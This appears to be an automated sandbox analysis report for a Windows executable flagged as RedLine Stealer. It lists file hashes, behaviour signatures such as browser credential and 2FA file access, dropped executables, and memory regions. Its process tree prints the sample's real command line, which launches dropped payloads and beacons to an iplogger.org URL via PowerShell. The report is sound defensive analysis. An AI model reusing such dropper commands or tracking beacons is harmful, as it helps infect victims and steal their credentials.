Analysis

  • max time kernel
    146s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    21-03-2021 12:01

General

  • Target

    38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe

  • Size

    1.1MB

  • MD5

    f5366963764901262499c8021333f986

  • SHA1

    e57b794220e7a6184614ccd4a6ddcf99de7e0717

  • SHA256

    38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f

  • SHA512

    84cde9fd4846e839fee7171546c76253c321af4bc619e2b0b4830077b9d966251e36217f60c6da6c31258770fbf71284a1896a7bc5b388c609ebf18be9c048d6

Malware Config

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
    "C:\Users\Admin\AppData\Local\Temp\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & start "" "jayson.exe" & start "" "riv.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe
        "hello_C# (2).exe"
        3⤵
        • Executes dropped EXE
        PID:1484
      • C:\Users\Admin\AppData\Local\Temp\hello_C#.exe
        "hello_C#.exe"
        3⤵
        • Executes dropped EXE
        PID:1968
      • C:\Users\Admin\AppData\Local\Temp\jayson.exe
        "jayson.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1784
        • C:\Users\Admin\AppData\Local\Temp\jayson.exe
          "{path}"
          4⤵
          • Executes dropped EXE
          PID:1292
        • C:\Users\Admin\AppData\Local\Temp\jayson.exe
          "{path}"
          4⤵
          • Executes dropped EXE
          PID:1604
        • C:\Users\Admin\AppData\Local\Temp\jayson.exe
          "{path}"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:928
      • C:\Users\Admin\AppData\Local\Temp\riv.exe
        "riv.exe"
        3⤵
        • Executes dropped EXE
        PID:1704
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1412

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe

    MD5

    d6b9f530e7e8ddebea8069a0d94ad38e

    SHA1

    28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

    SHA256

    3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

    SHA512

    2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

  • C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe

    MD5

    d6b9f530e7e8ddebea8069a0d94ad38e

    SHA1

    28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

    SHA256

    3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

    SHA512

    2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

  • C:\Users\Admin\AppData\Local\Temp\hello_C#.exe

    MD5

    d6b9f530e7e8ddebea8069a0d94ad38e

    SHA1

    28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

    SHA256

    3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

    SHA512

    2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

  • C:\Users\Admin\AppData\Local\Temp\hello_C#.exe

    MD5

    d6b9f530e7e8ddebea8069a0d94ad38e

    SHA1

    28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

    SHA256

    3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

    SHA512

    2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

  • C:\Users\Admin\AppData\Local\Temp\jayson.exe

    MD5

    68f70e9545a6dbeecd3e2eba38c197ca

    SHA1

    5d0fdc7452e3af1c4d7b145256888687e5fd2a72

    SHA256

    a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

    SHA512

    99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

  • C:\Users\Admin\AppData\Local\Temp\jayson.exe

    MD5

    68f70e9545a6dbeecd3e2eba38c197ca

    SHA1

    5d0fdc7452e3af1c4d7b145256888687e5fd2a72

    SHA256

    a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

    SHA512

    99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

  • C:\Users\Admin\AppData\Local\Temp\jayson.exe

    MD5

    68f70e9545a6dbeecd3e2eba38c197ca

    SHA1

    5d0fdc7452e3af1c4d7b145256888687e5fd2a72

    SHA256

    a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

    SHA512

    99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

  • C:\Users\Admin\AppData\Local\Temp\jayson.exe

    MD5

    68f70e9545a6dbeecd3e2eba38c197ca

    SHA1

    5d0fdc7452e3af1c4d7b145256888687e5fd2a72

    SHA256

    a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

    SHA512

    99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

  • C:\Users\Admin\AppData\Local\Temp\jayson.exe

    MD5

    68f70e9545a6dbeecd3e2eba38c197ca

    SHA1

    5d0fdc7452e3af1c4d7b145256888687e5fd2a72

    SHA256

    a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

    SHA512

    99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

  • C:\Users\Admin\AppData\Local\Temp\riv.exe

    MD5

    bd96d90751fd507c3af0edbe0d596ec4

    SHA1

    eed0bb7626d328190c7de701c0071f9c4ad048ef

    SHA256

    f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db

    SHA512

    5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

  • C:\Users\Admin\AppData\Local\Temp\riv.exe

    MD5

    bd96d90751fd507c3af0edbe0d596ec4

    SHA1

    eed0bb7626d328190c7de701c0071f9c4ad048ef

    SHA256

    f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db

    SHA512

    5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

  • \Users\Admin\AppData\Local\Temp\hello_C# (2).exe

    MD5

    d6b9f530e7e8ddebea8069a0d94ad38e

    SHA1

    28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

    SHA256

    3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

    SHA512

    2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

  • \Users\Admin\AppData\Local\Temp\hello_C#.exe

    MD5

    d6b9f530e7e8ddebea8069a0d94ad38e

    SHA1

    28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

    SHA256

    3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

    SHA512

    2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

  • \Users\Admin\AppData\Local\Temp\jayson.exe

    MD5

    68f70e9545a6dbeecd3e2eba38c197ca

    SHA1

    5d0fdc7452e3af1c4d7b145256888687e5fd2a72

    SHA256

    a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

    SHA512

    99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

  • \Users\Admin\AppData\Local\Temp\jayson.exe

    MD5

    68f70e9545a6dbeecd3e2eba38c197ca

    SHA1

    5d0fdc7452e3af1c4d7b145256888687e5fd2a72

    SHA256

    a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

    SHA512

    99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

  • \Users\Admin\AppData\Local\Temp\jayson.exe

    MD5

    68f70e9545a6dbeecd3e2eba38c197ca

    SHA1

    5d0fdc7452e3af1c4d7b145256888687e5fd2a72

    SHA256

    a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

    SHA512

    99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

  • \Users\Admin\AppData\Local\Temp\jayson.exe

    MD5

    68f70e9545a6dbeecd3e2eba38c197ca

    SHA1

    5d0fdc7452e3af1c4d7b145256888687e5fd2a72

    SHA256

    a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

    SHA512

    99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

  • \Users\Admin\AppData\Local\Temp\nsc677.tmp\YPUD2.dll

    MD5

    293165db1e46070410b4209519e67494

    SHA1

    777b96a4f74b6c34d43a4e7c7e656757d1c97f01

    SHA256

    49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

    SHA512

    97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

  • \Users\Admin\AppData\Local\Temp\riv.exe

    MD5

    bd96d90751fd507c3af0edbe0d596ec4

    SHA1

    eed0bb7626d328190c7de701c0071f9c4ad048ef

    SHA256

    f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db

    SHA512

    5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

  • \Users\Admin\AppData\Local\Temp\riv.exe

    MD5

    bd96d90751fd507c3af0edbe0d596ec4

    SHA1

    eed0bb7626d328190c7de701c0071f9c4ad048ef

    SHA256

    f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db

    SHA512

    5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

  • memory/636-36-0x000007FEF6010000-0x000007FEF628A000-memory.dmp

    Filesize

    2.5MB

  • memory/928-73-0x0000000000400000-0x0000000000428000-memory.dmp

    Filesize

    160KB

  • memory/928-74-0x0000000000421DFE-mapping.dmp

  • memory/928-76-0x0000000073E50000-0x000000007453E000-memory.dmp

    Filesize

    6.9MB

  • memory/928-77-0x0000000000400000-0x0000000000428000-memory.dmp

    Filesize

    160KB

  • memory/928-79-0x0000000000590000-0x0000000000591000-memory.dmp

    Filesize

    4KB

  • memory/1152-2-0x00000000760C1000-0x00000000760C3000-memory.dmp

    Filesize

    8KB

  • memory/1412-64-0x000000007EF30000-0x000000007EF31000-memory.dmp

    Filesize

    4KB

  • memory/1412-63-0x00000000062D0000-0x00000000062D1000-memory.dmp

    Filesize

    4KB

  • memory/1412-31-0x0000000073E50000-0x000000007453E000-memory.dmp

    Filesize

    6.9MB

  • memory/1412-26-0x0000000000000000-mapping.dmp

  • memory/1412-38-0x0000000001DD0000-0x0000000001DD1000-memory.dmp

    Filesize

    4KB

  • memory/1412-65-0x0000000007690000-0x0000000007691000-memory.dmp

    Filesize

    4KB

  • memory/1412-40-0x0000000004A70000-0x0000000004A71000-memory.dmp

    Filesize

    4KB

  • memory/1412-41-0x0000000004A30000-0x0000000004A31000-memory.dmp

    Filesize

    4KB

  • memory/1412-42-0x0000000004A32000-0x0000000004A33000-memory.dmp

    Filesize

    4KB

  • memory/1412-43-0x00000000025D0000-0x00000000025D1000-memory.dmp

    Filesize

    4KB

  • memory/1412-62-0x00000000062B0000-0x00000000062B1000-memory.dmp

    Filesize

    4KB

  • memory/1412-45-0x00000000027B0000-0x00000000027B1000-memory.dmp

    Filesize

    4KB

  • memory/1412-55-0x0000000005770000-0x0000000005771000-memory.dmp

    Filesize

    4KB

  • memory/1412-49-0x0000000005660000-0x0000000005661000-memory.dmp

    Filesize

    4KB

  • memory/1412-54-0x00000000056D0000-0x00000000056D1000-memory.dmp

    Filesize

    4KB

  • memory/1484-6-0x0000000000000000-mapping.dmp

  • memory/1484-15-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmp

    Filesize

    9.9MB

  • memory/1484-19-0x0000000000820000-0x0000000000821000-memory.dmp

    Filesize

    4KB

  • memory/1704-32-0x0000000001F80000-0x0000000001F91000-memory.dmp

    Filesize

    68KB

  • memory/1704-34-0x0000000001F80000-0x0000000001FB8000-memory.dmp

    Filesize

    224KB

  • memory/1704-35-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

  • memory/1704-23-0x0000000000000000-mapping.dmp

  • memory/1784-37-0x0000000001210000-0x0000000001211000-memory.dmp

    Filesize

    4KB

  • memory/1784-46-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/1784-67-0x00000000048A0000-0x00000000048FE000-memory.dmp

    Filesize

    376KB

  • memory/1784-66-0x0000000005C50000-0x0000000005CE6000-memory.dmp

    Filesize

    600KB

  • memory/1784-30-0x0000000073E50000-0x000000007453E000-memory.dmp

    Filesize

    6.9MB

  • memory/1784-13-0x0000000000000000-mapping.dmp

  • memory/1784-44-0x0000000001170000-0x0000000001171000-memory.dmp

    Filesize

    4KB

  • memory/1968-24-0x0000000000B90000-0x0000000000B91000-memory.dmp

    Filesize

    4KB

  • memory/1968-17-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmp

    Filesize

    9.9MB

  • memory/1968-9-0x0000000000000000-mapping.dmp

  • memory/2036-4-0x0000000000000000-mapping.dmp